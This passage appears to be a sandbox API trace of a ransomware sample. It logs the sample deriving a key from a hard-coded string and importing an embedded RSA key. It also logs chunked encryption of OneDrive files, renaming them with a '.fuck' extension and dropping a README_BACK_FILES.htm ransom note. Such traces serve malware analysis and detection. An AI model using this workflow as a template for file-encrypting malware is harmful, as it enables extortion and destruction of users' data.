Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.768] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.769] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.769] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.769] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.769] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.769] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.769] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.770] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.770] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.770] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.770] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.770] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.770] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.770] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.770] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.770] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.770] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.771] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.771] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.771] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.771] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.771] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.771] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.772] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.772] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.772] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.772] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.772] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.773] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x1d0, lpOverlapped=0x0) returned 1 [0276.773] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x1d0, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x1e0) returned 1 [0276.773] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x1e0, lpOverlapped=0x0) returned 1 [0276.773] CloseHandle (hObject=0x5d3c) returned 1 [0276.773] CloseHandle (hObject=0x5d48) returned 1 [0276.773] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.779] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.779] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.782] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.783] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.783] CryptDestroyKey (hKey=0x2fb488) returned 1 [0276.783] CryptReleaseContext (hProv=0x2f2a0e0, dwFlags=0x0) returned 1 [0276.783] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.783] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.784] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\readme_back_files.htm")) returned 0xffffffff [0276.784] AreFileApisANSI () returned 1 [0276.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0276.784] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0276.785] GetFileType (hFile=0x5d4c) returned 0x1 [0276.785] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0276.787] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0276.787] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa748 [0276.788] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.788] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0276.788] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0276.788] GetLastError () returned 0x0 [0276.788] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\filesync.localizedresources.dll.mui")) returned 0x20 [0276.789] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0276.789] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0276.790] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ig-ng\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0276.794] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ig-ng\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0276.795] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2b730) returned 1 [0276.797] CryptCreateHash (in: hProv=0x2f2b730, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0276.797] lstrlenA (lpString="rSPGydZrXYMOziqdBDWJHbgxzMlQm") returned 29 [0276.797] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0276.797] CryptDeriveKey (in: hProv=0x2f2b730, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb308) returned 1 [0276.798] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0276.798] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0276.798] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2b840) returned 1 [0276.798] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2b840, dwCertEncodingType=0x1, pInfo=0x2f35350*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f35380*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f35388*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb608) returned 1 [0276.798] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0276.798] CryptEncrypt (in: hKey=0x2fb608, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2b8c8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2b8c8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0276.798] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2b8c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2b8c8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0276.800] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.807] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.807] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.813] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.813] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.813] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.813] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.813] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.813] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.813] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.813] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.813] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.813] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.814] CryptEncrypt (in: 